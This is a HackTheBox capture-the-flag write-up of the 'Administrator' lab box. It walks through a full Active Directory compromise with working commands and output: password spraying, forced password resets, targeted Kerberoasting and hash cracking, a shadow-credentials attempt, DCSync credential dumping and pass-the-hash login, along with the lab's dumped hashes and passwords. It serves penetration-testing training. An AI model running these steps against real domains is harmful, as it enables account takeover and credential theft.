[HackTheBox] Administrator
jamarir10 min read
Just another GenericAll / ForceChangePassword / Password Safe 3 / GenericWrite & targeted kerberoast / DCSync Write-up.
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:
Olivia / ichliebedich
Foothold
Open ports
The Nmap SYN scan shows out target is the DC (Kerberos, DNS, LDAP, WinRM):
jamarir@kali:~$ sudo nmap -sS -p- -v -Pn --disable-arp-ping -oA syn_full --open 10.10.11.42;
jamarir@kali:~$ nmap -Pn --disable-arp-ping -sC -sV -v -oA nse 10.10.11.42 -p$(grep -oP '^\d*(?=/)(?=.* open )' syn_full.nmap |sort -u |tr '\n' ',' |grep -oP '.*(?=,)')
[...]
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: <DATE>)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
55167/tcp open msrpc Microsoft Windows RPC
61390/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61401/tcp open msrpc Microsoft Windows RPC
61406/tcp open msrpc Microsoft Windows RPC
61409/tcp open msrpc Microsoft Windows RPC
61428/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
As a DNS server, it becomes ou local resolver:
jamarir@kali:~$ sudo sed -i '1i nameserver 10.10.11.42' /etc/resolv.conf
Whose FQDN is DC.administrator.htb:
jamarir@kali:~$ nxc smb 10.10.11.42
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
Down the rabbit holes
Our Olivia user has neither access to uncommon SMB share on the DC:
jamarir@kali:~$ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.10.11.42 445 DC [*] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
Nor the FTP service:
jamarir@kali:~$ ftp Olivia@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password:
530 User cannot log in, home directory inaccessible.
ftp: Login failed
ftp> exit
221 Goodbye.
Also, we could try to passsword spray our ichliebedich password against all users:
jamarir@kali:~$ nxc ldap 10.10.11.42 -u 'Olivia' -p 'ichliebedich' -d 'administrator.htb' --query "(&(objectCategory=person)(objectClass=user))" "sAMAccountName" |grep -oP '.*sAMAccountName:\s*\K.*'
Administrator
Guest
krbtgt
olivia
michael
benjamin
emily
ethan
alexander
emma
But we find no other credentials:
jamarir@kali:~$ nxc smb 10.10.11.42 -u users.txt -p 'ichliebedich' --shares --continue-on-success
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [-] administrator.htb\Administrator:ichliebedich STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\Guest:ichliebedich STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\krbtgt:ichliebedich STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [+] administrator.htb\olivia:ichliebedich
SMB 10.10.11.42 445 DC [-] administrator.htb\michael:ichliebedich STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\benjamin:ichliebedich STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\emily:ichliebedich STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\ethan:ichliebedich STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\alexander:ichliebedich STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\emma:ichliebedich STATUS_LOGON_FAILURE
Michael GenericAll’ed
As we have valid credentials over LDAP, we can collect bloodhound data. Let’s use the SharpHound ingestor (also compiled in the SharpCollection repo), for change, from a Windows machine:
PS C:\Users\jamarir> SharpHound.exe -d 'administrator.htb' --domaincontroller 10.10.11.42 --ldapusername 'Olivia' --ldappassword 'ichliebedich' -c all --collectallproperties
First, we may mark Olivia as Owned, and look for its transitive outbounds:
We find out that Olivia can WinRM (as a member of Remote Management Users). Also, Olivia may edit any MICHAEL’s property. Thus, we could either:
Target Kerberoast
MICHAELto crack its TGS’s password.Shadow Credentials
MICHAELto have a persistence access to its session through PKI authentication.Force Change Password
MICHAELto change his password.
Targeted kerberoast doesn’t allow to crack its password, using RSAT for instance:
PS C:\Users\jamarir> Set-ADUser -Identity 'MICHAEL' -ServicePrincipalNames @{Add='AAA/HACK'} -Verbose -Server 10.10.11.42 -Credential (New-Object System.Management.Automation.PSCredential('administrator.htb\Olivia', (ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force)))
VERBOSE: Performing the operation "Set" on target "CN=Michael Williams,CN=Users,DC=administrator,DC=htb"
PS C:\Users\jamarir> Rubeus.exe kerberoast /nowrap /domain:'administrator.htb' /dc:10.10.11.42 /creduser:'administrator.htb'\'Olivia' /credpassword:'ichliebedich' /user:MICHAEL
[...]
[*] Target User : MICHAEL
[*] Target Domain : administrator.htb
[*] Searching path 'LDAP://10.10.11.42/DC=administrator,DC=htb' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=MICHAEL)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : michael
[*] DistinguishedName : CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] ServicePrincipalName : AAA/HACK
[*] PwdLastSet : 06/10/2024 02:33:37
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*michael$administrator.htb$AAA/HACK@administrator.htb*$159EA9A05317925EF7D8C90326759E9C$5E3CA5E9A2E67BC0AB13C501A868323EE871A8E9D04C008A87894F3D53452300D7CAA06C4534EE964C57420B333AEE94A3B064CEE2E102BA7185448FD42823B87B681D95B6B5EA415F3EB1657EA6524B6988D162AF03930A09F83EF4B0B643F87E7A49D237E25C761FCB1700C2CFC3A880CB5423BD2E4D0D2AF0F0B165F0D7AA1E9CDC6A8CFDFD4423FCBA3B566897832D2D284400269B760868C23CE787DF7EC1B32536827FCBAF619A2542C1B0D60F989A89801ECECC9825D480AC8D322ECC18AB64AC6D02E9AA93AA6C035AA56FF6EF70ECEC33704B73383FFD8EDB1504581B2727F6A113868C08426039746F330E59CEDB8464261BFE7334F8822F80C12F08658B17D66F3669FB7A203EAC7BA585098A5D9EE45DA45EC5EE14A753CA1F93758AB6D720E5BE6D1775D4DE08002E325B9416666AA1B0AB0371C9F840225E3BC5DA10459347D36E8B30FC4648D63447E8F9228D03E0ACF3208EBDA4B5C86B8E7409D4953E28244572C47E0B153D21B302CF5D5DC7F9956FBFD6D66012E968A0D0F5E5656A68BA989FC1D040184A052CD44B85A50AB0F55A5689ED55BC908E482F1703AB038DC132AB0D1EE445A3C253D9035E460C3EF407C57FD01FEB175102A3B603FF19E2083D66F1FF1E422894CD6856F43642E532507BF3273533137EFF106EB1BFE8F05CB6901618DF60D10562FB205C672CEC5FDFE0FB8094CFDCA3DF9A9FD23B8E18A3855BF8F721BD7E839E3D4E608C6D385070156CA08D501CB45586BB8C348857F78FC9E37DFD50ACEDD5281839B02AA2B13DA434DE930770A2DB4C4FD6FA12BE3A3F586F85479B9F9246C75CAB0BBEF5336F2C3E81ADA93238CE1D9DC52C47C562EEDD60F48FF35F75B2C990C328A1468AC046A7ADB276A8019E35A47F04EE56588EE6746A029AA866D4F13459A1411896D0C81D6A246EED37A516299C417C19956119A3BBAF3B4C0182BD34B225698F7DBCDF2A08F068826C3D04EB271B257580EC1FB090B527492CA55A75EDB6F3A59D88BBEF692B05998800CA1F783875346AADB1247A3A609DEDB8410659B6293293581904AAE20C049B7C55EDDAED9C01B7CD33571C18B96EC5B2F04A8C5032B0CCC87C04190065D3102D6BB5FAAB82DEF8A12A5FA28A0D5CFAA6C9D5A3F5E6FB61F1C866346AFA277F423559AF20A8EBE254ECAEF15BA161E16DF150127CCD84ADA37E4E28AD368E5BC5677DB173D4C8FECA89DA505FE5A7FD77F8D6A09C428A1C415808333F508AB7B313F9A89CDD7D1F017372534E33029FE2DFA2B9BD3C0A3FBBFACA985AD41845E16AB61176333D4C3562D58B694BC11DEC6F08A76C9D2646BF2A033AA971D269EACA54125401B0B2CE4CA8C775F50D24DC3BE6FD1C6321E547D7EF0A1DB8DBDCE4593674ABBDEC0F42AD5B35094CFC2188D5717F1BD156EC605BEA1ABD7734F43F8A4F647FD9968CF59C600E292AB14BADD95B53F1E24D253D1CF09726889F16386B75C3A6F8F7545B1C96CEE976A0D1E2399B4BD8892037215F829469A08C89266C142BFEBBBB7DA779231CD3386DDB45F679B727CD35C1F17BB1DDEBBFA2B9E2ED9035EFFF2FBF026C2924B88A164490BB14C10BD88505733324672F6EC9B4A2FC74104171E8FFB20F684D4F7F7AABFC5170CFA332DF
jamarir@kali:~$ echo '$krb5tgs$23$*michael$administrator.htb$AAA/HACK@administrator.htb*$15[...]DF' |john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin
Then, let's update michael's password instead using:
net rpcfrom thepth-toolkit:
jamarir@kali:~$ net rpc password 'michael' 'P@ssw0rd123!' -U administrator.htb/'Olivia'%'ichliebedich' -S 'administrator.htb'
- or PowerView:
PS C:\Users\jamarir> Set-DomainUserPassword -Domain administrator.htb -Identity 'michael' -AccountPassword (ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force) -Server 10.10.11.42 -Credential (New-Object System.Management.Automation.PSCredential('administrator.htb\Olivia',(ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force)))
This user has not access to more shares:
PS C:\Users\jamarir> nxc smb 10.10.11.42 -u 'michael' -p 'P@ssw0rd123!' --shares
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\michael:P@ssw0rd123!
SMB 10.10.11.42 445 DC [*] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
Nonetheless, he can WinRM:
But no interesting files are exposed in his personal folder:
jamarir@kali:~$ evil-winrm -i 10.10.11.42 -u 'michael' -p 'P@ssw0rd123!'
*Evil-WinRM* PS C:\Users\michael\Documents> Get-ChildItem -Path '..' -Recurse -File -Include *.xml,*.txt,*.doc*,*.xls*,*.csv,*.ppt*,*.pdf,*.ini,*cfg,*.conf,*.*sql,*.exe,*.zip,*.tar,*.swp,*.bak,*.bk,*.*sh,*.py,*.log*,*.cgi,*.db,*.yml,*.yaml 2>$null |Select -Expand FullName
Benjamin ForceChangePassword’ed
Hence, let’s just move on and update Benjamin's password:
jamarir@kali:~$ rpcclient 10.10.11.42 -U administrator.htb/'michael'%'P@ssw0rd123!' -c 'setuserinfo2 benjamin 23 "P@ssw0rd123!";quit'
Again, this user doesn't have access to more shares :/
jamarir@kali:~$ nxc smb 10.10.11.42 -u 'benjamin' -p 'P@ssw0rd123!' --shares
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\benjamin:P@ssw0rd124!
SMB 10.10.11.42 445 DC [*] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
But as shown in the above BloodHound output, this user is a member of the non-default group Share Moderators.
We may retrieve the potentially non-default groups (with RID equal or more than a thoursands) using the following NEO4J query:
MATCH (g:Group) WHERE g.objectid =~ ".*-1\d{3,}$" return g
Note that the
DnsUpdateProxy,DnsAdmins, andWinRMRemoteWMIUsers_groups may have an RID above 1000, but still remain default groups, as their RID is “variable”:
We could even get any non-default domain user or object using the following Cypher queries, respectively:
MATCH (u:User) WHERE u.objectid =~ ".*-1\d{3,}$" return u MATCH (o) WHERE o.objectid =~ ".*-1\d{3,}$" return oCustom bloodhound queries may be edited in
~/.config/bloodhound/customqueries.jsonfor linux, and inAppData\Roaming\BloodHound\customqueries.jsonfor Windows.
psafe3 hashcat’ed
It sounds that thie SHARE MODERATOR groups allows its members to access the FTP service, as Benjamin can list its content !
jamarir@kali:~$ ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
229 Entering Extended Passive Mode (|||55057|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp>
The FTP server contains a Password Safe (psafe3) file, a password manager like Keepass, or 1Password. This file is definitely interesting, as it may contain other credentials for later impersonation. Such psafe3 file can be cracked with the 5200 hashcat mode:
jamarir@kali:~$ git clone --depth 1 https://github.com/junegunn/fzf.git ~/.fzf && ~/.fzf/install
jamarir@kali:~$ hashcat -h |sed -n '/^.*Hash modes.*$/,/^.*Brain Client Features.*$/p' |fzf
jamarir@kali:~$ hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
[...]
Backup.psafe3:tekieromucho
Session..........: hashcat
Status...........: Cracked
[...]
Password spraying the tekieromucho gives no result:
jamarir@kali:~$ nxc smb 10.10.11.42 -u users.txt -p 'tekieromucho' |grep -v 'STATUS_LOGON_FAILURE'
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
But we can open it with the pwsafe tool:
And add the password column:
To reveal the different credentials:
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
Privilege escalation
Emily Flag’ed
We finally get the user flag as Emily !
jamarir@kali:~$ evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
*Evil-WinRM* PS C:\Users\emily\Documents> gc ../desktop/user.txt
9f[...]c4
Ethan GenericWrite’ed
In BloodHound, we see emily can edit any attribute of the ethan user via the GenericWrite attribute:
And ethan can DCSync:
Ethan ShadowCredentials’ed (rabbit hole)
As bloodhound suggest, we could perform a Shadow Credentials attack. Let's use pywhisker for that:
- First we list the keys (for later restoration):
jamarir@kali:~$ pywhisker -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target "ethan" --action "list"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
- Then we add an arbirary private key, for us to authenticate as
ethanthrough themsDS-KeyCredentialLinkLDAP attribute:
jamarir@kali:~$ pywhisker -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target "ethan" --action "add" --filename test1
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 2534373f-1e0f-47e6-810f-f60aa9cf95e6
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: test1.pfx
[*] Must be used with password: oXlLDJOUeSzLADBT7kz7
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
- And request a TGT for
ethanusing PKINITtools. However, PKI authentication isn’t supported by the DC:
jamarir@kali:~$ python3 gits/PKINITtools/gettgtpkinit.py -cert-pfx test1.pfx -pfx-pass 'oXlLDJOUeSzLADBT7kz7' administrator.htb/ethan ethan.ccache
<DATE> minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
<DATE> minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
File "/home/jamarir/gits/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
File "/home/jamarir/gits/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
File "/home/jamarir/gits/PKINITtools/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
^^^^^^^^^^^^^^^^^^
File "/home/jamarir/.venv/lib/python3.12/site-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError: Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"
Indeed, no CA (Certificate Authority) is available in the domain:
jamarir@kali:~$ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' -M enum_ca
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\Olivia:ichliebedich
Ethan TargetedKerberoast’ed
Then, let’s resort to targeted Kerberoasting, using the targetedKerberoast tool for instance:
As we’ll be asking a TGS under the hood using
targetedKerberoast:jamarir@kali:~$ targetedKerberoast.py -h [...] --request-user username Requests TGS for the SPN associated to the user specified (just the username, no domain needed) [...]We’ll need to synchronize our time with the DC (through the NTP service) to avoid
KRB_AP_ERR_SKEWerrors:jamarir@kali:~$ sudo timedatectl set-ntp 0; sudo rdate -n 10.10.11.42
jamarir@kali:~$ python targetedKerberoast.py -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --request-user 'ethan' --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fcb9f13ed6e0c0f034b6cefb5d4d87ff$b76d4c113bb9d139f4cd855ae258d2a20fe732867b3cdd1a40a016b509217b3d03661304a3a1f21b96d7faa0a70d1fb2ed954a6f95ef611e12b4d3a77b5d7d9dce9f4a8b4ebf4cc6a99645116071fc54624b99c50c57de360a09142eb07aad3ef226945bd50c9dd0d60657606366dcd676b25fc558df25a1f0dca4a18ace4f1674affd70ce44fc51eef3f6ca004e84357c3238ca66af4d9b20092c05819f0ca8e81a59b0d8109c56a40f46e81a159fe6d783a7cf149922c816f05fe3021054fd20d7a9cfd7fdd39a7ebde2caac989e48b9fd6dff6700ad786f75836a484f4ffc33094238ae8df7b2fe171adcb47106537f224a01fb3235d634d8523f30949cd2b92fecf68e23ee43f812a49925355bad50dc89444f901e55bc8aa432655035579792fbef9bfde7423fd8b2648c516c92c15ab300fc9ca51312945ae65c346cbe9b7b590c074bf81e2e2f06d074be30e609bf2778514923f5900f2542439b1cafda7dabb369443a0f707a0595beaac4a73cf4eba2305efe66067f90ba41edbe3cc16a5e002522adbf081c55dfeabdd7d63878f142daa612a8d5fbb1e4c9addc779b31abb52f28ab75a2189b51f6333d59d6a8c1ec42e929e02d4c21ea652eb5a4fc091bfac751f8333a157c9f347de24f7305408a10f0d8a137b7076579ea7ceabdee7e2d5e5b0e754dda118771498c7181732737ce65ccc7a6a7c47af938d8923aec8273c3b43c308f5ec72d2004e19f2a1eaa1420a74e6b8535faa80363d26b6c174b4fd48d88d4a7d8d3ca7c4745b6286b4e1ec01a3297751abc4a659de40eaac4101937d9e6971745c1039953532fce313566d090bd9c41d038977ab037ee1ec70d740621e2eecf6f691d43c438731e203ae800eab7d3d1c1ad9275b439fc665d7402fdede1b25f5c45a872dc9c22c47f97b3c8dce6ff9b05794c955d732eb1741a644209a3a81ea6aa8545b472c54eed1453ca3b2d557ffa5c21c81a1fba709e48a59b8ab4c3cc3114ee54c18d19366d78169d05b3f8b52fd5fcdbe6211b731c22e736a9bb5a8d3e5ae50962b458abbfa6ab44143403da323af50e3ee3b534339e49b27339d938c4887df54d03f6499b65735af9fa93fa7cf055e6838b0f0b8340315a5a33021f9f1c9ddd96769922937a6cae87e11b82eae8e724aae46ed10ec3db7eae729a64ace94e7d0955e91022d64e65a179c3ca7806ec473d438e146537eab3dbb7a16d1311e98f9fe3c8218469ca4690e839384c3dcd174968e2410291b1275a7f122050ec13af99bc64a968cbdf6d33a1cd5f05c2c47a3479d2fb1a69c08eb491aba5d39dee4c7786a474458ce9e0a4903971f1cbdb61810d73e873ca6606c73b123c1793261158da4dc3d9b945a2e578ca4f575055d6488b6122c327f1d29e66f6f985fd1399db31ab32a87f817bfad1e2ff7171572d331464899e653b09265a9765dc44cfd07bca587b41d906b817ec60bf8ffe87a046b5bc71cebf4af57e904af493babb5e356b9d31a95a5cdcc93059adba3595c27a75
The ethan's SPN TGS can be cracked using john:
jamarir@kali:~$ echo '$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fc[...]75' |john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin
[...]
limpbizkit (?)
Allowing us to DCSync !
jamarir@kali:~$ secretsdump.py 'administrator.htb/ethan:limpbizkit'@10.10.11.42
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:0bf8db0ccffb814ccc08a01f6db4a0b467ca415f057376d9e133caf2e969d0c5
administrator.htb\michael:aes128-cts-hmac-sha1-96:ca4c1cd81c3f5d3fff07db8ee002d8e7
administrator.htb\michael:des-cbc-md5:3762f762376e9b1f
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:d39b22befc97a0a86f7f1e0aed2452b012f2b5c0867ac3582798dcc8fd1c69a9
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:01b313b2179870f59a0b11ab872f2835
administrator.htb\benjamin:des-cbc-md5:5b3d58abe61c7a57
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
The domain administrator’s NTHash is 3dc553ce4b9fd20bd016e098d2d2fd2e. GG WP !
jamarir@kali:~$ psexec.py -hashes ':3dc553ce4b9fd20bd016e098d2d2fd2e' 'Administrator'@10.10.11.42
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
8d[...]54
0
Subscribe to my newsletter
Read articles from jamarir directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
jamarir
jamarir
Pentester, CTF Player, Game Modding Enthusiast | CRTO